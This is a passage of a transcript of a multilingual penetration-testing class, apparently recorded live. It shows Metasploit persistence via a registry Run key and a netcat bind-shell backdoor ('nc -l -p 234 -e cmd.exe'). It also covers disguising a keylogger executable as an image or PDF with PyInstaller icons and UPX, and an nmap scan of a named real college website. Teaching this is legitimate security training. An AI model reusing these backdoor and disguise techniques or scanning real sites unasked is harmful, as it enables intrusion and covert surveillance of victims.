4444, right? And it has started the reverse sampling. Coming to here, like close, and then one answer metadata greater than info, right? Info, so that is system. Now then see, I mean, one thing is that set persistent, set persist. I forgot the spelling, you know, set persistence, persistence, I guess. I might be wrong. Unknown command, set persistent, persistent minus h. Oh my god.
unknown command. Anyway, so I forgot actually. Anyhow, this stuff we are not going to use, this persistence stuff. Persistence. I need to check the spelling. What I am going to do is that I am going to, make it, put it in background, so that I will keep it in background, right? So put it in background. So right now I'll be using use exploit Windows local, then Windows local. What was the exploit name? Exploit Windows local persistence. Yes, persistence. So exploit Windows local persistence. It was the name of the exploit. And then show show options. Show options. These are some values which you need to consider while setting up the values, like the delay and all this stuff, so let the delay will be with 10 seconds only, and the exe name, you can specify the exe name out here. So the exe name, then the path, then the registry name, then the session, and then the startup by user VBS name. So what I do feel that among these all variables, all are not mandatory. So like these are being set like exe name required. You can see if I can scroll it a little bit up, I have already told you that this field is very important, required. Now if this required is yes, that means you need to you need to put the value against this particular variable, right? If it is no, that means it is optional, like exe name, whether you want to execute a file while executing this backdoor, right? Then you might put the path of your backdoor. Like in this particular case, I can put up the exe name like where www html, then private, then showmo77.exe, right? That thing I can mention with the value for this particular variable, and startup and the session. But very important thing is that like in session field, session variable, it is stated as yes. That means you need to set the value for this particular session. So what I'm supposed to do out here, I need to keep on set, then ACSSIOM, set session space 1. That is what I actually require to set. And let me try executing this stuff, otherwise I would have filled some other values. So now you can see that it has actually executed some of the persistent VBA script, which is Visual Basic Script, right, written to test on this particular location, which is the temp location, right? Why they do have added this file, their malicious file in this particular temp location, and the file name is this one, and the extension name is .vbs, because users hardly check their temporary locations, right? So this location is very important for the hackers at least, and more or less this particular location, and this is the thing. And see, I mean, this is the auto run kind of stuff test, and this is the registry path. Guys, probably you can recall, I have told you the registry plays very important role. Even if the user gets understand that yes, this is the file, I have found this particular file, so that I need to delete this particular file, and he or she starts thinking that okay, fine, I got the file, I've removed the file, so my danger time is over. So right now I am well disconnected from the hacker system. But actually that doesn't happen. Why? Because once the file gets executed at your system, it automatically makes some changes at your system level, system level entries at your registry, Windows registry. So this is H key current user, H key HKEY current user full form, right? This is one tab.
right? This is one root category. Now inside this root category, you will find the software, then Microsoft, then Windows, then current version, then Windows. Then let me show you how you can find it. Like you can put it on run, and you can, you can here only you can type, like rageedit.msc, right? Rageedit.msc. I don't know whether I will get it or not. Rageedit.msc. I might have done some mistake. That is why it is not coming up out here. Anyhow, regedit. This was for registry edit, and MSC stands for Microsoft Console. I think there are some changes in Windows 10. I don't know. Regedit. No. It's nothing called regedit. I don't know. Earlier it was only regedit. Anyhow, so I will check, and if you know the solution, you can come up with the answer. That also I can, I am always keen to learn from your side also. I don't know, regedit was the command to edit the registry. Might have changed from Windows 10. So I need to find out. If you know the answer, you can come up with the answer later on. Anyhow, so H key, user, then software, then Microsoft, then Windows, then current version. These all are folders, subfolders, and then again run, and you'll find this entry out there, which is with this one. So if you seriously are looking to, disconnect your system from the hacker system, you first need to remove the file which is situated in the temp location of your machine. Along with that, you are also required to, remember this entire path, and you need to locate this particular entity, and you need to delete this particular entity, right? So right now you have injected another malicious file, and that malicious file is actually acting as a backdoor to this file. What is the advantage? Right now, if you come out of the system, I mean entire of this this Metasploit, this framework, and you just start MSF console once again, and you will feed whatever you wanted to, set, use exploit, then set persistence, set payload with all this stuff. While you will run exploit, this is the command, then what is going to happen? Then directly you will be inside that particular system. You need not to wait for the victim again to double click the file and install the file, because this backdoor is already there, placed at the target computer. Now from now onwards, you just need to type exploit. আমরা exploit টাইপ করতাম তো মেটাস্প্লয়েট এর ভেতরে বসে, তো সেই জাস্ট এক্সপ্লয়েট কমান্ডটা মারলেই আমরা ভেতরে ঢুকে যাব। এর জন্য আমাকে আবার ওয়েট করতে হবে না যে কখন ফাইলটা আমার ডাবল ক্লিক হবে, কখন ফাইলটা আমার এক্সিকিউট হবে ওয়ান্স এগেন। তো আমরা যতবার ইচ্ছে আমরা ভেতরে ঢুকতে থাকবো। আর একটা জিনিস আমরা দেখিয়েছিলাম, যেটা আমি জানি না এটাকে, এটা this was one example of setting up this persistence connection. Now the other example which I can recall, I have shown you, what I can do, session space minus session space minus I space 1। इसका मतलब क्या है कि हम लोग इंटरैक्ट करना चाहते हैं एक नंबर सेशन के साथ। सो क्विकली वी विल बी इनसाइड दिस मेटाप्रेटर वंस अगेन। तो और एक चीज हम लोग सीखे थे कि यहाँ पे हम लोग और एक काम कर सकते हैं, जैसे कि हम लोग इसको अपलोड कर सकते हैं, किसको, nc.exe, जो कि एक बैकडोर प्रोग्राम है। वहां पे हम लोग देखे थे कि ऑलरेडी वी कैन अपलोड दिस nc.exe at certain drive of the remote computer. Let me come to the remote computer by in DOS mode by typing the shell command, and let me check whether nc has already been uploaded or not. তো अभी দেখো আমি এখানে কোথায় আছি, আমি এখানে আছি সি ড্রাইভে। আমার যতদূর মনে পড়ছে আমরা ঠিক আছে, কোলনে আমরা যদি করি dir nc.exe, I could find this nc has already been excuse me, uploaded. Now guys, I can type exit and I can come out from here. I can again come. Now please come in the chat box and tell me what was the command and where the file actually is located, and how to put this file in the target computer. আরে বাবা প্রচুর কমেন্ট চলে এসেছে। উইন্ডোজ আর দেন regedit। ওকে, উইন্ডোজ আর দেন regedit। ওকে ফাইন, থ্যাংক ইউ গাইস, থ্যাংক ইউ। I don't know, thank you Rishi Golpo, Windows plus R, I will definitely try. Anyhow, so my question is that, let me put it very straightforward, that my question is that ki ami ekhane there is another way of executing this backdoor. This is one way only. The other way which I have demonstrated
wherein I have asked you that there is a file called nc.exe. nc.exe. Nc full form is netcat. Probably you can recall netcat. Now my question is right now, how to place this netcat.exe file. Probably you all can see this file nc.exe, which is already placed in this particular remote computer, you know, target computer, but it was not a file which is there, right? I mean, I have, you know, placed this file at the target computer, and I have demonstrated you all how to place this file, where this file exactly resides. Now I need the answer from your side, that how much you have done your practice on. So plus please recall and tell me that from where I can get this file and how to place this file at the target computer initially. बताइए कैसे करके ये फाइल कहाँ पे होता है, कैसे करके आपको मिलने वाला है, और कैसे करके आप इसको रिमोट कंप्यूटर, ये जो टारगेट कंप्यूटर यहाँ पे आप प्लेस कर सकते हो। ऐसे अभी तो आपको मिल रहा है, लेकिन ये ऑलरेडी प्लेस किया हुआ है। सब फोल्डर ईशान गोस्वामी, ভালো করে ভাবো ঈশান, ভেবে উত্তর দাও। বলো প্রাণেন্দু, বলো সাহিল, বলো নিরুপম। টেক্সট ফাইল কনভার্ট, না না, এই ফাইলটা থাকে লিনাক্সের মধ্যে, এই ফাইলটা থাকে কোথায় থাকে? Sir, USR share Windows binaries. হ্যাঁ, ইউএসআর শেয়ার উইন্ডোজ ড্যাশ বাইনারিজ এর মধ্যে থাকে। ভেরি গুড, ঠিক আছে, তুমি মিউট করে দাও। ভেরি গুড নিরুপম। আচ্ছা দেখো, ঠিকই বলেছে। তো you probably have forgot that, I mean, this is the path where we can find this particular file, you know, like, I mean, USR share windows dash binaries and then this particular file. আমরা এখানে কি করতে পারি, আমরা এখানে we can come up out here and we can, you know, and like q, we can come up out here and then ls slash usr, then share, then scripts, then I mean sorry, usr share windows dash binaries, usr share windows dash binaries। তাহলে আমরা যদি এখানে enter মারি, we can see there are few ready made this kind of malicious files, you know, gumi.exe, vncviewer.exe, wget.exe, plink.exe, exe to bat.exe, you know, this kind of few files which are there, and there are some files inside these folders too which are ready-made malicious files. Now nc is actually netcat and a very powerful tool, you know, and I have already demonstrated you how to upload this file, I mean by using the command upload. I mean, since we are here in Linux, so we can, you know guys, we can usually change our directory locations as we did in Linux. I mean, you know, we all know the command cd, so cd e drive. Now how to check where you are currently sitting? You can type a command pwd, with which you can get know about your current location, you know. So if this is the terminal of Linux, I could definitely you know, use this, I mean like this I mean this cd command. So cd e colon backslash, which will be putting you, I mean sorry, cde, I don't know what to be right, what to write, cde cde colon, then no, only e colon will work, you know, e colon unknown command. Okay, cd let me come out here, share e drive and then exit, then pwd, cd, I don't know what to write. If I would like to switch to e colon, guys, can you give me some suggestions that what I need to write? Sir, shell में डालना होगा, yes, but out here, can anyone help me that what to be you know, what to write if I do you know, like, I mean, I'm willing to change my directory location to e drive, cd e colon, but that I have already tried, Pranandu. cd e colon,
It's not working, I guess. Okay, fine. Thank you, Pranandu. Thank you. CD E colon, right? Probably it will be working right now. Right. Thank you. So if this is the case, that means I could highly use here a command called upload. Right? I could use the command upload, and then I know that upload, then from where to upload. USR share, like share, then Windows binaries, then binaries, then nc.exe, then space dot. So that has become my source up to this, and that has become my target. So between source and target there must be a space as separator, তাই তো? ভালো করে বুঝতে হবে। তাহলে আপলোড কাকে আপলোড করছি আর কোথায় আপলোড করছি, তাহলে আপলোড is the command, then a separator, then the source, then space, then your target. Dot means the current location. So in that way only you can upload, wherever you wish. Now once the upload is successful, what we can do, we can come in the drive, right? So here we are currently into our E drive. Now we can type dir, then nc.exe, just to find out, just to ensure that whether this file exists or it has been successfully uploaded or not. Now yes, of course I can see the file has already been uploaded, so that is why the file is available at this particular location. Now the question is how to execute this file. That means nc, right? You can simply type nc, because the name would be sufficient, because this is DOS prompt. We may not require to write the full path. Do we write cmd.exe anytime? We write only cmd, right? Do we write notepad.exe anytime? No, we write only notepad. So since this is Windows platform, it should understand that this executable file must have got the extension of .exe. So I mean, hardly it matters whether we are we are notifying this exe, we are adding this exe, or we are not adding this exe. By default it is going to be considered with exe as extension. So nc is the name of the file. Then I have told you that -l is for listen, then -p for port number. Now you can add any free port number. So let me go with for port number 234, and then -e for embed option. Now what I can do, I can choose cmd.exe. So what it is going to do, it is going to listen, it is going to set a listener. I mean, in which port it is going to open another free port, which is port number 234, or might be some other port number from 0 to 65,000, in between 0 to 65,534. -e stands for embed. Now you want your nc is going to bind with this particular program called cmd.exe, which is a legitimate program running out here. Now once we'll type out here enter, see the cursor is cursor is blinking out here. That means the terminal has not been closed at all. It is actually setting up the listener. I mean, as of now we know very I mean clearly that what is actually the job of the listener. So listener, we have checked it at Metasploit, that what listener actually does. So similar kind of activities can be done in form of nc. So it is going to open the port number as backdoor port number, whatever port number you will you will type. So like, so nc is always a very good option. So I mean, whenever you'll try to use this nc option, it is going to give you the full leverage to set up the backdoor, and I mean, get connected as and when you require to get connected. Now let's see, if I type the command, just a second guys, hold on, just a second, wait for just 1 minute. Hello, sorry for the interruption.
So, guys, I mean, like from the other terminal, I have injected a command called nc, and then this is the target IP address, and this is actually the port number, right? So you can probably see what I have done. From one terminal, I have set up a listener. This is nc command netcat, and this is L for listen, minus P stands for port, and this is actually the number of port. I mean, this port is actually the backdoor port. I mean, considering the fact that you are already there inside the system, you'd love to open another port on behalf of you. Minus E for embed, and you'd like to add your program with any of the existing programs. So this is what I was actually trying to say. And from other terminal, once you type a command called nc and then just the IP address of your target computer, then a space, then the port number, you just get connected. So that is a beautiful example of setting up the listener, I mean, setting up the backdoor, better to say. Now what I'm supposed to do, I will come out here, I will press Control C. So it is definitely going to close it for me, and I will type out here exit space minus Y. So it is going to, close all the sessions. And then again, I will type exit space minus Y. So it is going to close everything for me. So I am here at my terminal. So my Metapreter or Metasploit session has actually gets closed. So I will come out here too. So I will type exit and I will come out here too. Right? So I mean, from nowhere I am actually get connected to that particular system. So I will just type this particular command. I mean, onwards I will type this command, this nc command. I mean, probably some of the error, but otherwise it would have, I mean, get connected to my target system. That I will definitely check. But probably what I can recall, if you can find your past videos, I have already demonstrated this particular part to you all, wherein you have seen that you just require to type this command once again, and just the target IP address and the port number which you have mentioned, and you will be straight away inside the system. Even if you are not into that particular system, then also only by typing this command you will be inside. Why this is possible? Because guys, nc.exe is running on the target computer of Windows, right? Until you clear all the existence of nc.exe from this particular location. How is it possible? I have also demonstrated. You need to open this task manager. Probably you right now can recall what I have told you, that, and you actually need to find out the nc.exe. Now something has actually happened that my nc.exe is not coming up out here. So that is why I'm actually unable to see the I mean, get connected. So that is what I'm lacking of. Anyhow, so this was the only error. So because of this reason only, I'm not been able to get connected to the system. Otherwise this nc.exe should appear out here as a running process, which you need to identify, and you need to take the preventive measures, and till the file would be as the running processes, right, in the list of the running processes at the target computer. Now and then, whenever you wish, you just type a command nc and then the target computer IP address, and then this particular port number which you have defined. But that's it. You would definitely get connected to the system. Okay, 102. Yes, 102. Yes, that I was thinking that 104, 102. This was only the error. I might have worked with this 104 only. So anyhow, all of a sudden the IP address has got changed. Right now this is of 102. Anyhow, so that might be the error which I guess you can understand well, and you can resolve the bug. But this is the way how things actually works. তো এবার বলো তো এই কি নাম, দেবকান্ত, বলো আর তোমার কি জিজ্ঞাসা আছে ব্যাকডোর সম্বন্ধে? অলমোস্ট সব জিনিসই বলে দিয়েছি। তার কোনো প্রবলেম নেই। ঠিক আছে, আচ্ছা আচ্ছা আচ্ছা। এবার দেখো, তোমাদের সবাইকে একটা জিনিস বলি, খুব মাইনরলি দেখো, তোমাদেরকে আজকে আমি 3টে পিপিটি শেয়ার করব। পিপিটি, পাওয়ার পয়েন্ট প্রেজেন্টেশন। ঠিক আছে, এই পাওয়ার পয়েন্ট প্রেজেন্টেশন গুলো খুব ভালো করে দেখতে হবে। এবং এই পাওয়ার পয়েন্ট, দিস অল পাওয়ার পয়েন্ট প্রেজেন্টেশনস আর, I mean, give me some time, let me adjust my screen so that I do not require any more this particular stuff. So let me power off.
Okay, let this one open, and I do not require this. Okay, now what I need to do? Like guys, I mean, now what I'm trying to say is that I will be sharing you these kind of PPTs. Now these PPTs are very important, but initially you need to have these three PPTs, one, then two, then three. These three PPTs are very important, wherein you will find all the web application kind of stuff. So what I want from your side, that you just go through these PPTs. These are very easy, and this web application penetration testing is much more easier in comparison to what you have learned till date, right? क्योंकि देखिए एक चीज तो आप लोग को समझना ही पड़ेगा, क्योंकि आप लोग इसमें बहुत कुछ चीज ऐसा सीखे हैं जो एक्चुअल में मतलब शायद आप लोगों का करिकुलम में भी नहीं है, क्योंकि इतना कुछ पाइथन प्रोग्रामिंग आप लोगों का करिकुलम में नहीं है. बट बिकॉज ऑफ द रीजन कि यू हैव शोन लॉट ऑफ इंटरेस्ट इन दिस फील्ड, so I have started sharing lot many things with you all, with a expectation from your side that you will also participate like I actually I am expecting. And I mean, you'll come up with flying colors. So that is my expectation from your side, because all of you are very serious and very enthusiastic in this particular field. So जो हम चाहते हैं फिलहाल कि ये तीन पीपीटी जो हम शेयर करने वाले हैं ना, ये तीन पीपीटी आप लोग बहुत ध्यान से देखिए. और यहाँ पे दिस पीपीटीज आर एब्सोल्युटली टूल बेस्ड, टूल बेस्ड, इज नथिंग रिलेटेड टू कोडिंग. Try and understand once more. Let me repeat my point. The PPTs which I am going to share with you right now, these PPTs are nothing related to nothing related to your coding. कोई भी एक भी कोडिंग आपको यहाँ पे नहीं मिलने वाला है. तो this is entirely based on entirely based on tools. So go through the tools. If you want, you need to download the tools and execute the tools and just see whether whatever I have written at the PPT is actually happening or not. But definitely of course it is going to get happen, not an issue. But the main factor is that while before the next class, I need all of you to read these three PPTs, because in the next class whatever I have a plan, because there is one element or unit which is a big unit, and that unit is called SQL injection. So I must practically show you the SQL injection part, which I love to show all of you. And this SQL injection plays very important role. But before SQL injection, you guys need to have a clear fundamental idea about the web part, right? So that is why initially I would love to forward you these three PPTs. Go through these PPTs, you will be having an idea about the web and web-based attacks and web-based enumeration, everything. Like for an example, just to give you a demo, right? I mean, let me show you a few things, right? So let me come in my, sorry, by mistake I have like I have okay, anyhow, probably I can work in Kali also, not an issue. So guys, I mean, probably you can recall that I have already mentioned that we are we have actually a like a location, like a very simple example for web application enumeration or website enumeration. We have a location called USR, then share, then nmap, then scripts. This is yes. আচ্ছা, তো সন্দীপ লিখছে, দেবকান্ত লিখছে, স্যার ইমেজ বা পিডিএফ পেলোড বানানোটা কি দেখিয়ে দেবেন?
আচ্ছা, প্রশ্নটায় আসছি। একটা হচ্ছে স্যার ইফ পসিবল আগের পিপিটি গুলো যদি একসাথে শেয়ার করতেন তাহলে ভালো হতো। পিপিটি আর আমার মনে হয় না শেয়ার করা কিছু আছে সন্দীপ, কেননা সব থেকে বড় ব্যাপার যেটা ভালো করে দেখো, যে আমার মনে হয় তোমরা তো রেকর্ডেড সেশনটাই পাচ্ছ, এবং রেকর্ডেড সেশনে তোমাদের যতটুকু দরকার ততটুকু জিনিস আমি পিপিটিতে শো করছি, ততটুকুই লাগছে। এর বেশি পিপিটি আমার মনে হয় না তোমাদের এই মুহূর্তে কোনো কিছু দরকার আছে। যে পিপিটি গুলো তোমাদের লাগবে ওকে ফাইন, সরি, আই মিন আই উইল ডেফিনেটলি। আচ্ছা, একটা প্রশ্ন তোমাদের কাছে আসি, যেটা দেবকান্ত জিজ্ঞেস করেছে। আচ্ছা, এই যে প্রশ্নটা, যে স্যার ইমেজ বা পিডিএফ পেলোড বানানো কিভাবে যায় সেটা কি দেখিয়ে দেবেন? আচ্ছা, ইউ গাইস, আই এম placing the question, I mean I am asking the same questions to all of you. I mean, don't you have any idea about how to build this PDF and like image kind of exploits? Tell me how to do it. Because what I can recall, guys, if you can proceed through all the previous slides and all the previous recorded session, I have already given you the hint and shown you so many things wherein you can actually use this PDF and JPEG for these things. ভালো করে ভাবো, দেখো ভালো করে ভাবো তুমি দেবকান্ত, আমরা একটা সফটওয়্যার দেখেছিলাম, যেখানে আমরা দেখেছিলাম যে ব্যাট টু ইএক্সি কনভার্টার, ব্যাচ ফাইল টু ইএক্সি কনভার্টার। ভেরি গুড রণজিৎ। ব্যাট টু ইএক্সি কনভার্টারে আমরা দেখিয়েছিলাম যে কিভাবে তুমি একটা ইমেজকে ডাউনলোড করবে। আমরা বলেছিলাম কিভাবে তুমি তার আইকনটাকে আলাদা করে ডাউনলোড করবে, কোথা থেকে আইকন ডাউনলোড করবে, কি রেজলিউশন দিয়ে আইকন ডাউনলোড করবে, এবং সেটাকে নিয়ে তুমি কাজ করবে। আলটিমেটলি সেটা তোমার একটা ইমেজ ফাইল বা পিডিএফ ফাইলের আন্ডারে আসবে। এক্স্যাক্টলি। তো 256 ঋষিকল্প 216 নয়, 256 মাল্টিপ্লাইড বাই 256। তো এই ব্যাক টু ইএক্সি কনভার্টারটা খুব ভালো কাজ করে। আবার দেখো, আমরা যদি পাই ফাইলকে ডাইরেক্টলি আমরা ইএক্সি তে কনভার্ট করতে চাই, ইফ we want to convert our .py file to .exe, there also we can add this image as option wherein you can actually add these things. তাহলে তোমাদের যেটা করতে হবে, ইউ নিড টু ফাইন্ড দ্য হেল্প অফ দিস টুল। তোমাদেরকে আমি বলেছিলাম, দেখো ভালো করে দেখো, আই হ্যাভ টোল্ড ইউ দেয়ার ইজ ওয়ান বিউটিফুল সফটওয়্যার কল্ড পাই ইনস্টলার, তাই তো গো? পাই ইনস্টলার মাইনাস মাইনাস হেল্প করে দেখো যে what are the options which can be added with this পাই installer, and therein you will find that there are plenty of options wherein you can add the image, you can add their icon, all the options are there, so this is also very good. And when it is actually required, py installer will come in place whenever you love to convert your .py file straight away to .exe. I have told you, see, there is one beautiful option as icon, and what you need, guys, you need this .ico file. Can you recall that I have also shown you the website wherein to convert the .png at .bmp .jpeg to .ico? Can you remember? Icon convert, easyicon.net. Can you recall the site name? easyicon.net. That was the site which I have recommended. তোমরা তো ভুলে গেছো, পুরনো স্লাইড গুলো ভালো করে দেখো, চ্যাট বক্সে দেখো, তো দেখবে easyicon.net. So this is the website which I have shared with all of you. I have demonstrated to convert this file. See, minus minus icon is the option which you can add it to add this this icon kind of stuff, so like plenty of options which are there in this py installer stuff. Like, I mean, if I scroll it a little bit up, and then I can find some more information. See, additional binaries, minus minus add binaries. If you'd like to add some binary files, binary executable files, you can do it by minus minus add then data, right? Minus minus add then data. See, minus minus hidden import, ঠিক আছে?
তো দেখো এখানে plenty of options are there, minus minus add file, and this was the option that I was using, you know, minus minus one file. क्यों हम लोग क्या बताए थे कि जैसे देखिए zlogger4.py एक फाइल है, उसके चलते keylogger4.py एक दूसरा फाइल है, दोनों फाइल एक साथ काम करने वाले हैं। तो दोनों फाइल को आपको जब आप exe में कन्वर्ट कर रहे हो ना, तो दोनों फाइल को एक साथ लेके आपको exe में कन्वर्ट करनी है। तो फिर इसीलिए आप उसी डायरेक्टरी में पहले जाइए जहाँ पे दो फाइल आपका एग्जिस्ट कर रहा है, तो सीडी देके उस डायरेक्टरी के अंदर आप चेंज करके लोकेशन चेंज करके अंदर चले जाइए, फिर आप पाई इंस्टॉलर बोल के कमांड लगाइए, फिर आप यूज कीजिए ये वाली ऑप्शन माइनस माइनस वन फाइल, ठीक है। तो फिर क्या होगा कि आप जो फाइल का नाम देने वाले, आप फाइनल फाइल का नाम ही देने वाले हो, जैसे zlogger4.py, but since it will go inside the file and it will check and will see that it has got a line that import keylogger4.py as the first line defined, so automatically it would search the file name called keylogger4.py, and it is going to take that file as well as zlogger4.py, and it will, you know, combine these two files and will come up with one single exe file conversion. So you know, plenty of options. See, তোমরা ভালো করে যদি দেখো তাহলে দেখবে আমি তোমাদের প্রচুর জিনিস শিখিয়েছি। দেখো আমরা ইউপিএক্স বলেছিলাম তো গো, ইউপিএক্স দেখো পাই ইনস্টলের সাথে তোমরা ইউপিএক্স অপশনকে অ্যাড করতে পারবে, এবং এখানে তোমরা আউটপুট ডিরেক্টরি মেনশন করতে পারো যে কম্প্রেশনের পরে, ইউপিএক্স কম্প্রেশনের পরে তোমরা কোথায় এটাকে ফেলতে চাইছো, কোন লোকেশনে ফেলতে চাইছো, কি নাম দিয়ে ফেলতে চাইছো। ভালো করে পুরোনো ভিডিওগুলো তোমাদের সবাইকেই বলছি একবার করে দেখতে হবে গো, ঠিক আছে। প্লেন্টি অফ অপশনস, দেখো কি না কাজ করা যেতে পারে, ঠিক আছে, পাই ইনস্টলার দিয়ে। যখন আমরা একটা বলি যে পাই ইনস্টলার অনলি ফর কনভার্টিং ওয়ান পাই ফাইল টু .exe file, but therein you will find plenty of options with which you can do this embedding, you can add the icon, you can, you know, add some more extra features while converting it to exe, ঠিক আছে। আচ্ছা, তাহলে দেখো আমরা যেটা বলছিলাম যে আমরা এই স্ক্রিপ্টসে কোন জায়গায় ছিলাম আমি ভুলে গেছি, কি একটা দেখাচ্ছিলাম, যাই হোক। হ্যাঁ, এখানে আমরা দেখাচ্ছিলাম ওয়েব নিয়ে। তো ওয়েবে আমরা একটা সিম্পল জিনিস যদি তোমাদের বলি যে আমরা ওয়েবের ইনুমারেশন কি করে করব, মানে আমরা কিভাবে, আমরা প্রথম আমাদের কাজটা কি, প্রথমে আমাদের কাজ হচ্ছে the first step is to find out all the bugs and open ports in the website, তাই তো। তো আমরা ফিরে যাব, we will go back to our first few chapters, you know, wherein we have learned information gathering, and therein see, I mean, always you will find 1 lakh different tools, but it is not possible for a human being to learn all the tools. Day in day out developers are working on it, and they all are coming up with their own solutions. So is it possible for all of you that, I mean, every day you will be, you know, learning the execution of new tools? So that is why always it is good that learn the basics, and whenever new tools would come and you can see the tools, you can understand the internal behavior of the tool, and you will understand, okay, fine, based on this knowledge only they have worked and they have come up with a new solution. The look and feel is different, the behavior is a little bit different, but altogether the entire nature of the file remains same, right? তো এবার দেখো আমরা একটা সিম্পল এক্সাম্পল দিচ্ছি কিভাবে আমরা কাজ করি। আমরা এখানে দেখো কত রেডিমেড স্ক্রিপ্ট আছে, এবং আমরা তোমাদেরকে বলেও ছিলাম যে এখানে আমরা এরকম ভাবে ধরো আমরা এরকম করতে পারি ls then http then star then, you know, like grep, sorry, ls then pipe sign then grep then http then, you know, like, you know, yellow grep http, yes, grep http, okay, fine, grep http. I do not require to, you know, add some wildcard characters, I do not require to add. Anyhow, so if I find if I start find all the, you know, all the stuffs which are there, I mean which has this http in there as one keyword, so, you know, I will find all these beautiful things, and there are plenty of ready-made scripts which I have demonstrated in the chapter of scanning, and I have told you how basically this tool is important.
See, there is one beautiful script called HTTP enum, right? That is for enumeration. And there is also, there are plenty of tools. Let me show you one beautiful, a simple tool altogether. Like, I mean, in map, then minus script, then equals to, then BA in a near banner, then like come out here and then typing, then gnit dot dot in. So I don't know, I love this site and I love this college very much. This thing, right? So you can straight away see that I'm working on this kind of IP address, but I would have given the name of the domain also. What I did out here, I have pinged this particular domain name called gnit.ac.in, and it has come up with the server's IP address for which is acting as the web server on behalf of this particular website. So what I'm doing out here, I have executed this particular script called banner grabbing on this particular IP, so that, see, you can see the basic type of banner grabbing is possible with this banner ready-made script. See, it can give you an idea about what are the ports which are opened. Not only that, what are the web server service which is in used. The FTP service is open, which is very, very dangerous. So on this particular IP, the FTP port is open, which is very kind of dangerous element, that since we all can understand that FTP is without any without any security part. Yes, of course you can make FTP secure, but that too in not that way that other protocol does. Anyhow, so you need to be very careful about this FTP, and you need to I will come up all these points. So with this banner, I could at least get the information that what are the ports which are open, port numbers are there, and associated service names are also there. 80 port is open, which is associated with HTTP. 135 port might be open, but it is right now filtered. What I have told you guys, whenever you will see this filtered as the parameters, filtered means that some of the firewall restrictions are there. The port is open, the port is acting, but it is some restrictions are there, so that only authorized persons can access this particular port number. So that is what filtered stands for. Open means nothing is there, it is actually for public. So I mean, some of the other informations are also there, from where you need to understand, you need to find out your own interest stuff. Now let me come up to a very important point, that guys, I mean, take a help of Google always. Whenever you will find this kind of open port numbers, always do search in Google that the vulnerabilities for port number 21, the vulnerabilities for port number 30, the vulnerabilities for port number 3306. So are you trying to, I mean, if you try to understand my point, these are sequentially stepped. First you need to understand the ports which are absolutely open, no filtrations are there. Now if that port is sensitive, you understand, but you need to understand what are the vulnerabilities on which you can actually target with the exploits. So for that reason only, you need to take the help of Google. You need to search that the exploits which can be possible for port number 21, the exploits or vulnerabilities which are there on port number, for any other port number like 3306, right? So these are standard port number. 3306 is always meant for MySQL. So Google will give you, Google will help you, because there are plenty of sites, one of which is exploit-db.com. I have told you, exploit exploit-db.com, wherein you can find this this kind of open ports and corresponding vulnerabilities informations. But otherwise, straight away, you should not, I mean, you need not to visit this particular website and find out all this stuff. You can Google, because there are plenty of sites which can give you an idea about what kind of vulnerabilities can reside if the port is open, this particular port number is open, associated with the services, and what should be your exploitation type to exploit this particular stuff. Why these kind of informations are available at the web? Because by letting you know, they're expecting from your side that you are going to take the preventive measures, and you are going to filter or make some preventive measures to secure your system. So that is why plenty of informations will be available on the ports, on the open ports, and all this stuff. There is also another website which I love very very much, which is I guess HackerOne.
That is one very good website, you know, HackerOne open ports. You can search like this way only, HackerOne open ports. So it can come up with plenty of informations that, you know, for which particular open port, what kind of vulnerabilities, you know, you can try and you can experiment this, you can expect this kind of vulnerabilities for this particular, you know, port number, so that these type of exploitation, you know, can happen. So otherwise guys, always is I have probably in some of my classes I have also told you that you better try with this particular software also. It's a fantastic software, you know. I always recommend this software, but due to some time lagging I could not show you this software. This is called Nessus, you know. Let me increase the font size a little bit so that you can see it properly. The software name is Nessus, you know, Nessus. So you need to find out the, you know, way of installation of Nessus. The in internet all the informations are available. You need to download the software, you need to, you know, you need to install the software at your Linux system, so that while you will, you know, execute this Nessus, it will come up with a GUI, you know, GUI wizard, wherein you can run this kind of scanning itself on your own system for the security stuff, and it will come up with plenty of informations, like, I mean, all the open ports with all the security loopholes, with all the, you know, vulnerabilities, probable vulnerabilities, with all the, you know, exploitations that could happen by virtue of having these open ports, right? So that it always, you know, make you aware about the fact that, see, this is actually happening, so I am warning you that you should, you know, like, I mean, few days back only it has happened. I mean, you know, I probably have shared with all of you that, you know, PHP 5 has got a lot of bugs, you know. So immediately guys should update and upgrade to, I mean, the company should upgrade to PHP 7, because there are a lot of bugs and it has been exposed for many times, right? So that is what, I mean, always, I mean, which version of web server you're using, what type of web server you're using, this kind of information easily the, you know, this kind of I mean, hackers can get. Like, see, with a single command only you're getting this kind of. Now if a single command can come up with this kind of information, just guess that this kind of heavy softwares can come up with an entire report in PDF format, that these are the probable you know, causes, and these are the probable risk factors that you should consider well enough, right? So, you know, I mean, like the last example, I should I would like to modify a little thing, that, you know, like HTTP dash headers, headers, right? HTTP dash headers, that this is also, you know, another kind of, you know, scripts which is available at this particular point. HTTP headers, HTTP enum, this kind of all NAC files are there, with which we can gather more information about the website. The only issue is that I have not used the site name, but against it I have actually tried up with the ping command and with this particular domain name, and since I'm very much flexible with this IP address, so I have taken the IP address you know, for this particular website. Otherwise I would have used the site name also, the similar kind of result I supposed to get. So not an issue, but here some more information you could get with this HTTP headers kind of stuff. You know, what kind of information? See, you can find out HTTP headers like Apache. Okay, fine, now I understand. Okay, fine, the target computer is using the Linux web hosting server, right, which is Apache, and the version of Apache is 2.4.3, and Unix is the operating system. Unix is the server side operating system, right guys? Okay, fine. And then OpenSSL is the stuff, right? And then find out, okay, fine, these are the stuff, filtered, these are fine. Okay, so this is the fact. So what I have understood, that the target computer is actually the Unix computer, and they are using the Apache as the web server service, and the Apache is 2.4.3. and see, the most interesting thing out here, see, they're still using PHP version 5.6.5. So guys, come in the chat box and tell me what are the loopholes that you're expecting you can actually exploit. বলো বলো বলো, তাড়াতাড়ি বলো, এখন তোমাদেরকে অনেক এফিশিয়েন্ট হতে হবে, তাড়াতাড়ি বলো। এই ব্যানারটা থেকে তোমরা নিজেরা কি বুঝছো যে কি কি জিনিসগুলোকে এক্সপ্লয়েট করা যেতে পারে, ভালো করে ভেবে বলো। যা, আর কেউ কিছু বলছে না। বলো গো।
